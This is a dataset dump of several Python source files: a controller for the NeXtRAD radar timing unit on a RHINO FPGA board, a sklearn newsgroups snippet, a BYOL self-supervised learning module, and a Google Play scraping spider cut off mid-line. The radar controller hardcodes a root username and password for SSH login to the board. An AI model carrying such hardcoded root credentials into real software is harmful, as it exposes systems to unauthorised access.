+{"seq_id":"453809862","text":"import sys\nimport os.path\nimport argparse\nimport time\nimport logging\nimport npyscreen\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem\n\nfrom controller_v2_gui import Ui_MainWindow\nimport harpoon\nfrom harpoon.boardsupport import borph\nfrom parser import TCUParams\n\n\nclass TCUController(harpoon.Project):\n \"\"\"\n Class that controls NeXtRAD's Timing Control unit\n Making use of the Harpoon Framework\n \"\"\"\n\n def __init__(self,\n fpga_con,\n name='tcu_controller',\n description='project to communicate with the RHINO-TCU',\n cores=list(),\n address=None,\n headerfile=None,\n verify=False,\n bof_exe=None,\n debug=False,\n log_dir=str(),\n auto_update=False,\n auto_arm=False,\n voice=False\n ):\n \"\"\"creates a new instance of TCUController\n\n :param harpoon.FPGAConnection: Class to facilitate the low level communication between PC and TCU\n :param str name: name of the project\n :param str description: description of the project\n :param list cores: harpoon.cores associated to this project\n :param str address: IP address of TCU\n :param str headerfile: name and path of the headerfile containing TCU parameters\n :param str bof_exe: name of the .bof executable residing in the TCU\n :param bool debug: display debug output to console\n :param str log_dir: path to store log file\n :param bool auto_update: automatically update registers when header file has changed\n :param bool auto_arm: automatically update registers AND arm the TCU when header file has changed\n :param bool voice: voice prompts\n \"\"\"\n\n harpoon.Project.__init__(self, name, description, cores)\n\n self.fpga_con = fpga_con\n self.address = address\n self.headerfile = headerfile\n self.verify = verify\n self.bof_exe = bof_exe\n self.auto_arm = auto_arm\n if self.auto_arm:\n self.auto_update = True\n else:\n self.auto_update = auto_update\n self.voice = voice\n\n self.is_connected = False\n self.is_running = False\n\n self._init_logger(log_dir, debug)\n\n self.logger.debug('TCUController controller instance created with args:')\n self.logger.debug('\\taddress = {}'.format(self.address))\n self.logger.debug('\\theaderfile = {}'.format(self.headerfile))\n self.logger.debug('\\tbof_exe = {}'.format(self.bof_exe))\n self.logger.debug('\\tauto_arm = {}'.format(self.auto_arm))\n self.logger.debug('\\tauto_update = {}'.format(self.auto_update))\n self.logger.debug('\\tvoice = {}'.format(self.voice))\n\n self.init_headerfile_thread()\n\n def _init_logger(self, log_dir='', debug=False):\n self.logger = logging.getLogger('tcu_project_logger')\n self.logger.setLevel(logging.DEBUG)\n self.log_dir = log_dir\n # create file handler which logs even debug messages\n fh = logging.FileHandler(self.log_dir+'tcu_'+self.fpga_con.address+'.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n if debug is True:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n formatter2 = logging.Formatter('[%(levelname)s] %(message)s')\n ch.setFormatter(formatter2)\n fh.setFormatter(formatter)\n # add the handlers to logger\n # use logging.getLogger() with no params to get all the other loggers from imported modules\n 
logging.getLogger().addHandler(fh)\n self.logger.addHandler(ch)\n\n def init_headerfile_thread(self):\n if self.headerfile is not None:\n watched_dir = os.path.split(self.headerfile)[0] # os.path.split() returns tuple (path, filename)\n print('watched_dir = {watched_dir}'.format(watched_dir=watched_dir))\n patterns = [self.headerfile]\n print('patterns = {patterns}'.format(patterns=', '.join(patterns)))\n self.event_handler = FileEventHandler(self.logger, patterns=patterns)\n self.observer = Observer()\n self.observer.schedule(self.event_handler, watched_dir, recursive=False)\n self.observer.start()\n else:\n self.logger.warn('no headerfile path given, cannot start headerfile monitor')\n\n def connect(self):\n if self.address is not None:\n self.logger.info('initializing rhino connection, IP address: ' + self.address)\n try:\n self.fpga_con.connect()\n self.is_connected = True\n self.power_fmc()\n self.logger.info('connection successful!')\n if self.voice:\n os.system('spd-say -t female1 -i -0 \"connected\" -r -30 -p -30')\n except Exception as e:\n self.logger.exception('failed to connect to tcu')\n else:\n self.logger.error('IP address not set, cannot connect.')\n\n def disconnect(self):\n self.logger.info('disconnecting from tcu...')\n try:\n self.fpga_con.disconnect()\n self.logger.info('disconnect successful!')\n except Exception as e:\n self.logger.exception('failed to disconnect from tcu')\n\n def power_fmc(self):\n self.logger.debug('calling power_fmc.sh script...')\n fpga_con._action('./power_fmc.sh')\n # time.sleep(3)\n # self.fpga_con._action('echo 102 > /sys/class/gpio/export')\n # self.fpga_con._action('echo out > /sys/class/gpio/gpio102/direction')\n # self.fpga_con._action('echo 1 > /sys/class/gpio/gpio102/value')\n # self.fpga_con._action('echo out > /sys/class/gpio/gpio100/direction')\n # self.fpga_con._action('echo 1 > /sys/class/gpio/gpio100/value')\n\n def start(self):\n if fpga_con.ssh_connected():\n self.logger.info('starting bof...')\n self.fpga_con.launch_bof(self.bof_exe, link=True)\n if self.fpga_con.running():\n self.logger.info('bof started!')\n else:\n self.logger.error('failed to start bof \\'{}\\' on TCU \\'{}\\', please check log file \\'{}\\''\n .format(self.bof_exe,self.address, self.log_dir+'tcu_'+self.fpga_con.address+'.log'))\n else:\n self.logger.error('cannot start bof without connection, connect to TCU first. Use tcu.connect() method.')\n\n def stop(self):\n if fpga_con.ssh_connected():\n self.logger.info('stopping .bof...')\n self.fpga_con.kill_bof()\n else:\n self.logger.error('cannot kill bof without connection, connect to TCU first. 
Use tcu.connect() method')\n\n def parse_header(self):\n self.logger.info('parsing header file...')\n self.tcu_params = TCUParams(self.headerfile)\n self.logger.debug('Extracted parameters from header:\\n' + str(self.tcu_params))\n\n def write_registers(self):\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('writing registers...')\n params = self.tcu_params.get_int_params()\n reg_num_repeats.write(params['num_repeats'])\n reg_num_pulses.write(params['num_pulses'])\n reg_x_amp_delay.write(params['x_amp_delay'])\n reg_l_amp_delay.write(params['l_amp_delay'])\n reg_rex_delay.write(params['rex_delay'])\n reg_pri_pulse_width.write(params['pri_pulse_width'])\n reg_pre_pulse.write(params['pre_pulse'])\n\n # need to do a bit more work for reg_pulses,\n # as it is a more complex data structure\n hex_params = self.tcu_params.get_hex_params()\n pulses = hex_params['pulses']\n pulse_param_str = str()\n for pulse in pulses:\n pulse_param_str += pulse['pulse_width'].replace('\\\\x', '') \\\n + pulse['pri'].replace('\\\\x', '') \\\n + pulse['pol_mode'].replace('\\\\x', '') \\\n + pulse['frequency'].replace('\\\\x', '')\n\n pulse_param_bytearray = bytearray.fromhex(pulse_param_str)\n reg_pulses.write_bytes(pulse_param_bytearray, raw=True)\n\n self.logger.debug('registers written')\n if self.verify:\n self.logger.debug('checking registers...')\n self.check_regs()\n else:\n self.logger.error('No bof running, cannot perform register writes. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot perform register writes. Use tcu.connect() method')\n\n def check_regs(self):\n \"\"\"reads back the TCU registers and compares them with the parameters sent\"\"\"\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('verifying registers...')\n params = self.tcu_params.get_int_params()\n register_value_correct = True\n if self.check_reg(reg_num_repeats, params['num_repeats']) == False:\n register_value_correct = False\n if self.check_reg(reg_num_pulses, params['num_pulses']) == False:\n register_value_correct = False\n if self.check_reg(reg_x_amp_delay, params['x_amp_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_l_amp_delay, params['l_amp_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_rex_delay, params['rex_delay']) == False:\n register_value_correct = False\n if self.check_reg(reg_pri_pulse_width, params['pri_pulse_width']) == False:\n register_value_correct = False\n if self.check_reg(reg_pre_pulse, params['pre_pulse']) == False:\n register_value_correct = False\n\n # need to do a bit more work for reg_pulses,\n # as it is a more complex data structure\n hex_params = self.tcu_params.get_hex_params(hdl_format=True)\n pulses = hex_params['pulses']\n pulse_param_str = str()\n for pulse in pulses:\n pulse_param_str += pulse['pulse_width'].replace('\\\"', '') + pulse['pri'].replace('\\\"', '') + pulse['pol_mode'].replace('\\\"', '') + pulse['frequency'].replace('\\\"', '')\n pulse_param_str = pulse_param_str.replace('x', '')\n\n num_pulses = reg_num_pulses.read()\n read_value = reg_pulses.read_bytes()[0:(10*num_pulses)]\n read_value_str = str()\n\n if sys.version_info >= (3, 6):\n for pulse_index in range(num_pulses):\n # print('pulse[{}]'.format(pulse_index))\n pulse_width = read_value[pulse_index*10 + 0:pulse_index*10 + 2]\n # print('pw {}'.format(pulse_width.hex()))\n pri = read_value[pulse_index*10 + 4:pulse_index*10 + 6] + read_value[pulse_index*10 + 2:pulse_index*10 + 4]\n # 
print('pri {}'.format(pri.hex()))\n mode = read_value[pulse_index*10 + 6:pulse_index*10 + 8]\n # print('mode {}'.format(mode.hex()))\n freq = read_value[pulse_index*10 + 8:pulse_index*10 + 10]\n # print('freq {}'.format(freq.hex()))\n read_value_str += pulse_width.hex() + pri.hex() + mode.hex() + freq.hex()\n if read_value_str == pulse_param_str:\n self.logger.debug('Register \\'{}\\' verified'.format('pulses'))\n else:\n self.logger.error('Value mismatch for register \\'{}\\' retrieved {}, expected {}'.format('pulses', read_value_str, pulse_param_str))\n register_value_correct = False\n else:\n self.logger.warning('cannot verify the pulses register. needs Python >= 3.6')\n\n if register_value_correct:\n self.logger.debug('All registers have been verified')\n else:\n self.logger.error('One or more registers contain incorrect value(s) - see {} for details'.format(self.log_dir+'tcu_'+self.fpga_con.address+'.log'))\n else:\n self.logger.error('No bof running, cannot perform register reads. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot perform register reads. Use tcu.connect() method.')\n\n def check_reg(self, register, expected_value):\n \"\"\"returns True if the contents of given register matches a given value\"\"\"\n read_value = register.read()\n if read_value == expected_value:\n self.logger.debug('Register \\'{}\\' verified'.format(register.name))\n return True\n else:\n self.logger.error('Value mismatch for register \\'{}\\' retrieved {}, expected {}'\n .format(register.name, read_value, expected_value))\n return False\n\n def arm(self):\n \"\"\"arms the TCU\"\"\"\n if fpga_con.ssh_connected():\n if fpga_con.running():\n self.logger.info('arming tcu...')\n reg_instruction.write(0)\n # time.sleep(3)\n reg_instruction.write(1)\n if self.voice:\n os.system('spd-say -t female1 -i -0 \"armed\" -r -30 -p -30')\n else:\n self.logger.error('No bof running TCU, cannot arm TCU. Use tcu.start() method.')\n\n else:\n self.logger.error('No ssh connection to TCU, cannot arm TCU. 
Use tcu.connect() method.')\n\n\nclass FileEventHandler(PatternMatchingEventHandler):\n \"\"\"Overriding PatternMatchingEventHandler to handle when headerfile changes.\"\"\"\n def __init__(self, logger, patterns):\n super(FileEventHandler, self).__init__(patterns=patterns)\n self.logger = logger\n\n def on_modified(self, event):\n super(FileEventHandler, self).on_modified(event)\n self.logger.info('headerfile changed')\n if tcu.auto_update:\n if tcu.voice:\n os.system('spd-say -t female1 -i -30 \"updated\" -r -30')\n tcu.parse_header()\n tcu.write_registers()\n if tcu.auto_arm:\n print('arming tcu')\n tcu.arm()\n\n\nfpga_con = borph.RHINO(username='root', password='rhino', login_timeout=30) # default credentials for RHINO\n\n# -----------------------------------------------------------------------------\n# CORE INSTANTIATION\n# -----------------------------------------------------------------------------\ncore_tcu = harpoon.IPCore('tcu_core', 'Timing control unit', fpga_con)\n\n# -----------------------------------------------------------------------------\n# REGISTER INSTANTIATION\n# -----------------------------------------------------------------------------\nreg_pulses = harpoon.Register('pulses',\n 'Block of pulses in experiment',\n int, 140, 3, core_tcu)\nreg_num_repeats = harpoon.Register('num_repeats',\n 'Number of repeats for each pulse',\n int, 4, 3, core_tcu)\nreg_num_pulses = harpoon.Register('num_pulses',\n 'Number of pulses',\n int, 2, 3, core_tcu)\nreg_x_amp_delay = harpoon.Register('x_amp_delay',\n 'Switch-off delay for X band amplifier',\n int, 2, 3, core_tcu)\nreg_l_amp_delay = harpoon.Register('l_amp_delay',\n 'Switch-off delay for X band amplifier',\n int, 2, 3, core_tcu)\nreg_rex_delay = harpoon.Register('rex_delay',\n 'Delay for REX to output RF after PRI signal',\n int, 2, 3, core_tcu)\nreg_pri_pulse_width = harpoon.Register('pri_pulse_width',\n 'Pulse width of PRI signal',\n int, 4, 3, core_tcu)\nreg_pre_pulse = harpoon.Register('pre_pulse',\n 'Pre pulse duration before the main bang',\n int, 2, 3, core_tcu)\nreg_status = harpoon.Register('status',\n 'Current state of the TCU',\n int, 2, 1, core_tcu)\nreg_instruction = harpoon.Register('instruction',\n 'Control register for TCU',\n int, 2, 3, core_tcu)\n\n# add list of registers to the core\n# TODO: fix this reverse dependency between core and registers\nregisters = [\n reg_pulses,\n reg_num_repeats,\n reg_num_pulses,\n reg_x_amp_delay,\n reg_l_amp_delay,\n reg_rex_delay,\n reg_pri_pulse_width,\n reg_pre_pulse,\n reg_status,\n reg_instruction\n ]\ncore_tcu.registers = registers\n\n\nclass ControllerGUI(Ui_MainWindow):\n \"\"\"docstring for TCUPulseParamsGUILogic.\"\"\"\n\n def __init__(self, window):\n Ui_MainWindow.__init__(self)\n self.setupUi(window)\n self.but_headerfile.clicked.connect(self.read_header)\n\n self.timer = QtCore.QTimer()\n self.timer.setSingleShot(False)\n self.timer.timeout.connect(self.refresh)\n self.timer.start(3000)\n\n def read_header(self, arg):\n print('Clicked read_header button')\n tcu.parse_header()\n # time.sleep(10)\n\n def refresh(self):\n print('refreshing')\n\n\nclass TCUMonitorForm(npyscreen.Form):\n\n def afterEditing(self):\n self.parentApp.setNextForm(None)\n\n def create(self):\n self.count = 0\n self.keypress_timeout = 10 # refresh period in 100ms (10 = 1s)\n self.text_address = self.add(npyscreen.TitleText, name='IP Address', editable=False, value='xxx.xxx.xxx.xxx')\n self.text_connection = self.add(npyscreen.TitleText, name='Connection', editable=False, value='?')\n 
self.text_state = self.add(npyscreen.TitleText, name='State', editable=False, value='?')\n self.text_num_pulses = self.add(npyscreen.TitleText, name='Pulses', editable=False, value='?')\n self.text_num_repeats = self.add(npyscreen.TitleText, name='Repeats', editable=False, value='?')\n self.text_pre_pulse = self.add(npyscreen.TitleText, name='Pre Pulse', editable=False, value='?')\n self.text_x_amp_delay = self.add(npyscreen.TitleText, name='X Amp Delay', editable=False, value='?')\n self.text_l_amp_delay = self.add(npyscreen.TitleText, name='L Amp Delay', editable=False, value='?')\n self.text_rex_delay = self.add(npyscreen.TitleText, name='Rex Delay', editable=False, value='?')\n # self.grid_pulses = self.add(npyscreen.GridColTitles, name='Pulses', editable=False, column_width=10, height=7, max_height=10)\n # self.grid_pulses.col_titles =[ 'Pulse', 'Pulse Width', 'PRI', 'Mode', 'Frequency']\n # self.grid_pulses.values = [\n # ['0', '10.0', '1000', '0', '1300'],\n # ['1', '10.0', '1000', '1', '1300'],\n # ['2', '10.0', '1000', '2', '1300'],\n # ['3', '10.0', '1000', '3', '1300'],\n # ['4', '10.0', '1000', '4', '8500'],\n # ['5', '10.0', '1000', '5', '8500'],\n # ]\n self.button_arm = self.add(npyscreen.ButtonPress, name='Arm')\n self.button_arm.whenPressed = self.when_pressed_arm\n\n def when_pressed_arm(self):\n pass\n # self.button_arm.name = 'disarm'\n\n def while_waiting(self):\n # called every keypress_timeout period when user not interacting\n self.text_address.value = str(tcu.address)\n state = reg_status.read()\n if state == 0:\n self.text_state.value = 'IDLE'\n elif state == 1:\n self.text_state.value = 'ARMED'\n elif state == 2:\n self.text_state.value = 'RUNNING'\n elif state == 3:\n self.text_state.value = 'DONE'\n else:\n self.text_state.value = '???'\n if self.text_state.value == 1 or self.text_state.value == 2:\n self.button_arm.name = 'disarm'\n else:\n self.button_arm.name = 'arm'\n self.text_num_pulses.value = str(reg_num_pulses.read())\n self.text_num_repeats.value = str(reg_num_repeats.read())\n self.text_pre_pulse.value = str(reg_pre_pulse.read())\n self.text_x_amp_delay.value = str(reg_x_amp_delay.read())\n self.text_l_amp_delay.value = str(reg_l_amp_delay.read())\n self.text_rex_delay.value = str(reg_rex_delay.read())\n self.display()\n\n\nclass TCUMonitorApplication(npyscreen.NPSAppManaged):\n def onStart(self):\n self.addForm('MAIN', TCUMonitorForm, name='TCU MONITOR')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='tcu_controller [address]',\n description='Controller script for '\n 'NeXtRAD\\'s Timing Control Unit')\n parser.add_argument('address', help='IP address of TCU')\n parser.add_argument('-f', '--file', help=\"header file\")\n parser.add_argument('-b', '--bof', help='name of .bof file to be executed '\n 'on RHINO [\\'tcu_v2.bof\\']', default='tcu_v2.bof')\n parser.add_argument('-t', '--timeout', help='login timeout (seconds) to '\n 'establish SSH connection to RHINO [30]',\n type=int, default=30)\n parser.add_argument('-d', '--debug', help='display debug messages to STDOUT',\n action='store_true', default=False)\n parser.add_argument('-u', '--auto_update', help='automatically update '\n 'registers when header file has changed',\n action='store_true', default=False)\n parser.add_argument('-a', '--auto_arm', help='automatically update registers '\n 'AND arm the TCU when header file has changed',\n action='store_true', default=False)\n parser.add_argument('-v', '--voice', help='enable voice prompts',\n action='store_true', 
default=False)\n parser.add_argument('-c', '--check_regs', help='verify registers after writing',\n action='store_true', default=False)\n parser.add_argument('-l', '--logdir', help='directory to store log file '\n '[\\'/tmp/\\']', default='/tmp/')\n parser.add_argument('-g', '--gui', action=\"store_true\", default=False)\n parser.add_argument('-m', '--monitor', action=\"store_true\", default=False)\n parser.add_argument('-k', '--kill', help='kill running .bof',\n action=\"store_true\", default=False)\n parser.add_argument('-i', '--init', help='automatically connect and initialize '\n 'TCU',\n action=\"store_true\", default=False)\n args = parser.parse_args()\n\n fpga_con.address = args.address\n fpga_con.login_timeout = args.timeout\n\n tcu = TCUController(name='tcu_controller',\n description='project to communicate with the RHINO-TCU',\n cores=[core_tcu],\n fpga_con=fpga_con,\n address=args.address,\n bof_exe=args.bof,\n headerfile=args.file,\n verify=args.check_regs,\n debug=args.debug,\n log_dir=args.logdir,\n auto_update=args.auto_update,\n auto_arm=args.auto_arm,\n voice=args.voice\n )\n\n if args.init is True:\n tcu.connect()\n tcu.start()\n\n if args.monitor is True:\n tcu.connect()\n tcu.start()\n app = TCUMonitorApplication()\n app.run()\n\n if args.gui is True:\n app = QtWidgets.QApplication(sys.argv)\n\n window = QtWidgets.QMainWindow()\n\n program = ControllerGUI(window)\n\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"tcu_software/controller_v2.py","file_name":"controller_v2.py","file_ext":"py","file_size_in_byte":25122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378603726","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.datasets import fetch_20newsgroups\n#all categories\n#newsgroup_train = fetch_20newsgroups(subset='train')\n#part categories\ncategories = ['comp.graphics',\n 'comp.os.ms-windows.misc',\n 'comp.sys.ibm.pc.hardware',\n 'comp.sys.mac.hardware',\n 'comp.windows.x'];\nfrom sklearn import metrics\nnewsgroup_train = fetch_20newsgroups(subset = 'train',categories = categories);\nnewsgroups_test = fetch_20newsgroups(subset = 'test',\n categories = categories);\nprint(newsgroup_train.target)\n#create the Multinomial Naive Bayesian Classifier\n# clf = MultinomialNB(alpha = 0.01)\n# clf.fit(fea_train,newsgroup_train.target);\n# pred = clf.predict(fea_test);\n# calculate_result(newsgroups_test.target,pred);","sub_path":"new/ceshi.py","file_name":"ceshi.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569221329","text":"import argparse\nfrom typing import Any, Dict, List, Sequence, Tuple\nfrom solo.utils.metrics import accuracy_at_k, weighted_mean\nfrom copy import deepcopy, copy\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom solo.losses.byol import byol_loss_func\nfrom solo.methods.base import BaseMomentumModel\nfrom solo.utils.momentum import initialize_momentum_params\n\nfrom solo import metrics_utils\n\nclass BYOL(BaseMomentumModel):\n def __init__(\n self,\n output_dim: int,\n proj_hidden_dim: int,\n pred_hidden_dim: int,\n **kwargs,\n ):\n \"\"\"Implements BYOL (https://arxiv.org/abs/2006.07733).\n\n Args:\n output_dim (int): number of dimensions of projected features.\n proj_hidden_dim (int): number of neurons of the hidden layers of the projector.\n pred_hidden_dim (int): number of neurons of the hidden layers of the predictor.\n \"\"\"\n\n 
super().__init__(**kwargs)\n\n # projector\n self.projector = nn.Sequential(\n nn.Linear(self.features_dim, proj_hidden_dim),\n nn.BatchNorm1d(proj_hidden_dim),\n nn.ReLU(),\n nn.Linear(proj_hidden_dim, output_dim),\n )\n\n # momentum projector\n self.momentum_projector = nn.Sequential(\n nn.Linear(self.features_dim, proj_hidden_dim),\n nn.BatchNorm1d(proj_hidden_dim),\n nn.ReLU(),\n nn.Linear(proj_hidden_dim, output_dim),\n )\n initialize_momentum_params(self.projector, self.momentum_projector)\n\n # predictor\n self.predictor = nn.Sequential(\n nn.Linear(output_dim, pred_hidden_dim),\n nn.BatchNorm1d(pred_hidden_dim),\n nn.ReLU(),\n nn.Linear(pred_hidden_dim, output_dim),\n )\n\n @staticmethod\n def add_model_specific_args(parent_parser: argparse.ArgumentParser) -> argparse.ArgumentParser:\n parent_parser = super(BYOL, BYOL).add_model_specific_args(parent_parser)\n parser = parent_parser.add_argument_group(\"byol\")\n\n # projector\n parser.add_argument(\"--output_dim\", type=int, default=256)\n parser.add_argument(\"--proj_hidden_dim\", type=int, default=2048)\n\n # predictor\n parser.add_argument(\"--pred_hidden_dim\", type=int, default=512)\n\n return parent_parser\n\n @property\n def learnable_params(self) -> List[dict]:\n \"\"\"Adds projector and predictor parameters to the parent's learnable parameters.\n\n Returns:\n List[dict]: list of learnable parameters.\n \"\"\"\n\n extra_learnable_params = [\n {\"params\": self.projector.parameters()},\n {\"params\": self.predictor.parameters()},\n ]\n return super().learnable_params + extra_learnable_params\n\n @property\n def momentum_pairs(self) -> List[Tuple[Any, Any]]:\n \"\"\"Adds (projector, momentum_projector) to the parent's momentum pairs.\n\n Returns:\n List[Tuple[Any, Any]]: list of momentum pairs.\n \"\"\"\n\n extra_momentum_pairs = [(self.projector, self.momentum_projector)]\n return super().momentum_pairs + extra_momentum_pairs\n\n def forward(self, X: torch.Tensor, *args, **kwargs) -> Dict[str, Any]:\n \"\"\"Performs forward pass of the online encoder (encoder, projector and predictor).\n\n Args:\n X (torch.Tensor): batch of images in tensor format.\n\n Returns:\n Dict[str, Any]: a dict containing the outputs of the parent and the logits of the head.\n \"\"\"\n\n out = super().forward(X, *args, **kwargs)\n z = self.projector(out[\"feats\"])\n p = self.predictor(z)\n return {**out, \"z\": z, \"p\": p}\n\n def training_step(self, batch: Sequence[Any], batch_idx: int) -> torch.Tensor:\n \"\"\"Training step for BYOL reusing BaseModel training step.\n\n Args:\n batch (Sequence[Any]): a batch of data in the format of [img_indexes, [X], Y], where\n [X] is a list of size self.num_crops containing batches of images.\n batch_idx (int): index of the batch.\n\n Returns:\n torch.Tensor: total loss composed of BYOL and classification loss.\n \"\"\"\n\n out = super().training_step(batch, batch_idx)\n class_loss = out[\"loss\"]\n feats1, feats2 = out[\"feats\"]\n momentum_feats1, momentum_feats2 = out[\"momentum_feats\"]\n\n z1 = self.projector(feats1)\n z2 = self.projector(feats2)\n p1 = self.predictor(z1)\n p2 = self.predictor(z2)\n\n # forward momentum encoder\n with torch.no_grad():\n z1_momentum = self.momentum_projector(momentum_feats1)\n z2_momentum = self.momentum_projector(momentum_feats2)\n\n # ------- contrastive loss -------\n neg_cos_sim = byol_loss_func(p1, z2_momentum) + byol_loss_func(p2, z1_momentum)\n\n # calculate std of features\n z1_std = F.normalize(z1, dim=-1).std(dim=0).mean()\n z2_std = F.normalize(z2, 
dim=-1).std(dim=0).mean()\n z_std = (z1_std + z2_std) / 2\n\n metrics = {\n \"train_neg_cos_sim\": neg_cos_sim,\n \"train_z_std\": z_std,\n }\n self.log_dict(metrics, on_epoch=True, sync_dist=True)\n\n return neg_cos_sim + class_loss\n\n def validation_step(\n self, batch: List[torch.Tensor], batch_idx: int\n ) -> Tuple[Dict[str, Any], Dict[str, Any]]:\n \"\"\"Validation step for pytorch lightning. It performs all the shared operations for the\n momentum encoder and classifier, such as forwarding a batch of images in the momentum\n encoder and classifier and computing statistics.\n\n Args:\n batch (List[torch.Tensor]): a batch of data in the format of [X, Y].\n batch_idx (int): index of the batch.\n\n Returns:\n Tuple(Dict[str, Any], Dict[str, Any]): tuple of dicts containing the batch_size (used\n for averaging), the classification loss and accuracies for both the online and the\n momentum classifiers.\n \"\"\"\n batch2 = copy(batch)\n batch[0] = batch[0][0]\n batch2[0] = batch2[0][1]\n\n \n parent_metrics, metrics = super().validation_step(batch, batch_idx)\n parent_metrics2, metrics2 = super().validation_step(batch2, batch_idx)\n feats1 = parent_metrics['feats']\n feats2 = parent_metrics2['feats']\n\n # momentum_outs = [self._shared_step_momentum(b[0], b[1]) for b in [batch, batch2]]\n # momentum_feats1, momentum_feats2 = momentum_outs[0]['feats'], momentum_outs[1]['feats']\n\n with torch.no_grad():\n z1 = self.projector(feats1)\n z2 = self.projector(feats2)\n p1 = self.predictor(z1)\n p2 = self.predictor(z2)\n\n # # forward momentum encoder\n # z1_momentum = self.momentum_projector(momentum_feats1)\n # z2_momentum = self.momentum_projector(momentum_feats2)\n\n X, targets = batch\n batch_size = targets.size(0)\n\n metrics_utils.align_loss(p1, p2)\n latent_metrics = {\n \"our_alignment\": metrics_utils.align_loss(p1, p2),\n \"our_normalized_alignment\": metrics_utils.align_loss(p1, p2, normalized=True),\n \"our_cosine_distance\": metrics_utils.cos_dist_loss(p1, p2),\n \"our_uniformity\": metrics_utils.uniform_loss(p1),\n \"our_normalized_uniformity\": metrics_utils.uniform_loss(p1, normalized=True)\n }\n if metrics is not None:\n metrics = {**metrics, **latent_metrics}\n else:\n metrics = latent_metrics\n\n metrics[\"batch_size\"] = batch_size\n\n out = self._shared_step_momentum(X, targets)\n # out = momentum_outs[0]\n\n if self.momentum_classifier is not None:\n metrics = {\n \"momentum_val_loss\": out[\"loss\"],\n \"momentum_val_acc1\": out[\"acc1\"],\n \"momentum_val_acc5\": out[\"acc5\"],\n }\n\n return parent_metrics, metrics\n\n def validation_epoch_end(self, outs: Tuple[List[Dict[str, Any]]]):\n \"\"\"Averages the losses and accuracies of the momentum encoder / classifier for all the\n validation batches. 
This is needed because the last batch can be smaller than the others,\n slightly skewing the metrics.\n\n Args:\n outs (Tuple[List[Dict[str, Any]]]):): list of outputs of the validation step for self\n and the parent.\n \"\"\"\n\n parent_outs = [out[0] for out in outs]\n super().validation_epoch_end(outs)\n # online_predictions = parent_outs['logits']\n # target_projections = parent_outs['target_projections']\n momentum_outs = [out[1] for out in outs]\n log = {\n \"our_alignment\": weighted_mean(momentum_outs, \"our_alignment\", \"batch_size\"),\n \"our_normalized_alignment\": weighted_mean(momentum_outs, \"our_normalized_alignment\", \"batch_size\"),\n \"our_uniformity\": weighted_mean(momentum_outs, \"our_uniformity\", \"batch_size\"),\n \"our_normalized_uniformity\": weighted_mean(momentum_outs, \"our_normalized_uniformity\", \"batch_size\"),\n \"our_cosine_distance\": weighted_mean(momentum_outs, \"our_cosine_distance\", \"batch_size\"),\n }\n\n self.log_dict(log, sync_dist=True)\n\n if self.momentum_classifier is not None:\n\n val_loss = weighted_mean(momentum_outs, \"momentum_val_loss\", \"batch_size\")\n val_acc1 = weighted_mean(momentum_outs, \"momentum_val_acc1\", \"batch_size\")\n val_acc5 = weighted_mean(momentum_outs, \"momentum_val_acc5\", \"batch_size\")\n\n log = {\n \"momentum_val_loss\": val_loss,\n \"momentum_val_acc1\": val_acc1,\n \"momentum_val_acc5\": val_acc5,\n }\n self.log_dict(log, sync_dist=True)\n","sub_path":"solo/methods/byol.py","file_name":"byol.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503411687","text":"#coding=utf8\nfrom google_play_spider.items import GooglePlaySpiderItem\nimport scrapy\n\nclass PttSpider(scrapy.Spider):\n name = \"playspider\" \n start_urls = [\"https://play.google.com/store/apps/collection/topselling_free\",\n \"https://play.google.com/store/apps/collection/topselling_paid\",\n \"https://play.google.com/store/apps/collection/topgrossing\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_free\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_paid\",\n \"https://play.google.com/store/apps/category/GAME/collection/topgrossing\",\n \"https://play.google.com/store/apps/collection/topselling_new_free\",\n \"https://play.google.com/store/apps/collection/topselling_new_paid\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_new_free\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_new_paid\"] \n\n def parse(self, response): \n #取得 顯示更多內容 URL\n\n table_title = response.xpath('//div[@class=\"cluster-heading\"]/h2/text()')[0].extract().strip()\n total = 0\n for url in response.xpath('//div[@class=\"card no-rationale square-cover apps small\"]/div[@class=\"card-content id-track-click id-track-impression\"]'):\n total += 1\n\n title = url.xpath('div[@class=\"details\"]/a[@class=\"title\"]/text()')[0].extract()\n imgURL = 'https:' + url.xpath('div[@class=\"cover\"]/div/div/div/img/@data-cover-large')[0].extract()\n description_list = url.xpath('div[@class=\"details\"]/div[@class=\"description\"]/text()')[0].extract()\n description = ''.join(description_list)\n autor = url.xpath('div[@class=\"details\"]/div[@class=\"subtitle-container\"]/a/text()')[0].extract()\n targetURL = 'https://play.google.com' + url.xpath('div[@class=\"details\"]/a/@href')[0].extract()\n autor_URL = 'https://play.google.com' + 
